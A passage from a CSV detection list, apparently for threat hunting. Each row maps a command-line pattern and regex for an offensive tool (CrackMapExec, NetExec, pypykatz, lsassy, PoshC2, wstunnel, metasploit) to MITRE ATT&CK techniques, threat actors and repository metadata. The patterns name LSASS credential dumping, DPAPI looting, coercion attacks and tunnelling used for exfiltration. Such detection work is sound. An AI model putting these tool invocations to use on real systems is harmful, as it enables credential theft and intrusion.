tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -LocalPoshC2ProjectDir *",".{0,1000}\s\-LocalPoshC2ProjectDir\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* -LocalPoshC2ProjectDir *",".{0,1000}\s\-LocalPoshC2ProjectDir\s.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* LocalShellExtParse.py*",".{0,1000}\sLocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "* --local-to-remote socks5://*",".{0,1000}\s\-\-local\-to\-remote\ssocks5\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --local-to-remote stdio://*",".{0,1000}\s\-\-local\-to\-remote\sstdio\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --local-to-remote tcp://*",".{0,1000}\s\-\-local\-to\-remote\stcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --local-to-remote tproxy+tcp://*",".{0,1000}\s\-\-local\-to\-remote\stproxy\+tcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --local-to-remote tproxy+udp://*",".{0,1000}\s\-\-local\-to\-remote\stproxy\+udp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --local-to-remote udp://*",".{0,1000}\s\-\-local\-to\-remote\sudp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* -lockless -Command *",".{0,1000}\s\-lockless\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* --loggedon-users*",".{0,1000}\s\-\-loggedon\-users.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* loginAAD.ps1*",".{0,1000}\sloginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* looneypwner.sh*",".{0,1000}\slooneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "* --lport 1337 *",".{0,1000}\s\-\-lport\s1337\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* LPORT=4444*",".{0,1000}\sLPORT\=4444.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* lsa minidump * -o *",".{0,1000}\slsa\sminidump\s.{0,1000}\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* lsa minidump *.dmp*",".{0,1000}\slsa\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* lsa minidump *.dmp*",".{0,1000}\slsa\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* lsa minidump /*",".{0,1000}\slsa\sminidump\s\/.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* lsass.dmp*",".{0,1000}\slsass\.dmp.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* lsass_creds.txt*",".{0,1000}\slsass_creds\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* lsassy -k -d *",".{0,1000}\slsassy\s\-k\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* lsassy*",".{0,1000}\slsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "* lu-enum.nse*",".{0,1000}\slu\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* -M dfscoerce *",".{0,1000}\s\-M\sdfscoerce\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M empire_exec -o LISTENER=http-listener*",".{0,1000}\s\-M\sempire_exec\s\-o\sLISTENER\=http\-listener.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -m enrichment.cli.submit_to_nemesis*",".{0,1000}\s\-m\senrichment\.cli\.submit_to_nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* -M gpp_autologin*",".{0,1000}\s\-M\sgpp_autologin.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M handlekatz *",".{0,1000}\s\-M\shandlekatz\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M keepass_discover *",".{0,1000}\s\-M\skeepass_discover\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M keepass_discover*",".{0,1000}\s\-M\skeepass_discover.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M keepass_trigger -o ACTION=ALL USER=*",".{0,1000}\s\-M\skeepass_trigger\s\-o\sACTION\=ALL\sUSER\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -m lagentcmd *powershell *",".{0,1000}\s\-m\slagentcmd\s.{0,1000}powershell\s.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "* -M laps --kdcHost *",".{0,1000}\s\-M\slaps\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M ldap-checker *",".{0,1000}\s\-M\sldap\-checker\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M ldap-checker *",".{0,1000}\s\-M\sldap\-checker\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M lsassy *",".{0,1000}\s\-M\slsassy\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M MAQ --kdcHost *",".{0,1000}\s\-M\sMAQ\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M masky *CA=*",".{0,1000}\s\-M\smasky\s.{0,1000}CA\=.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M ms17-010 *",".{0,1000}\s\-M\sms17\-010\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M mssql_priv *",".{0,1000}\s\-M\smssql_priv\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M multirdp*",".{0,1000}\s\-M\smultirdp.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M nanodump *",".{0,1000}\s\-M\snanodump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -m olecmd -o *powershell *",".{0,1000}\s\-m\solecmd\s\-o\s.{0,1000}powershell\s.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "* -M pe_inject*",".{0,1000}\s\-M\spe_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M petitpotam *",".{0,1000}\s\-M\spetitpotam\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M petitpotam*",".{0,1000}\s\-M\spetitpotam.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M printnightmare *",".{0,1000}\s\-M\sprintnightmare\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -m privileged-users --full *",".{0,1000}\s\-m\sprivileged\-users\s\-\-full\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M procdump ",".{0,1000}\s\-M\sprocdump\s","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -m rdrleakdiag -M masterkeys*",".{0,1000}\s\-m\srdrleakdiag\s\-M\smasterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "* -m run_command -c *.exe*",".{0,1000}\s\-m\srun_command\s\-c\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -M runasppl *",".{0,1000}\s\-M\srunasppl\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M scuffy -o SERVER=127.0.0.1*",".{0,1000}\s\-M\sscuffy\s\-o\sSERVER\=127\.0\.0\.1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M scuffy*",".{0,1000}\s\-M\sscuffy.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M shadowcoerce *",".{0,1000}\s\-M\sshadowcoerce\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M shadowcoerce*",".{0,1000}\s\-M\sshadowcoerce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M shellcode_inject*",".{0,1000}\s\-M\sshellcode_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M slinky",".{0,1000}\s\-M\sslinky","offensive_tool_keyword","crackmapexec","crackmapexec 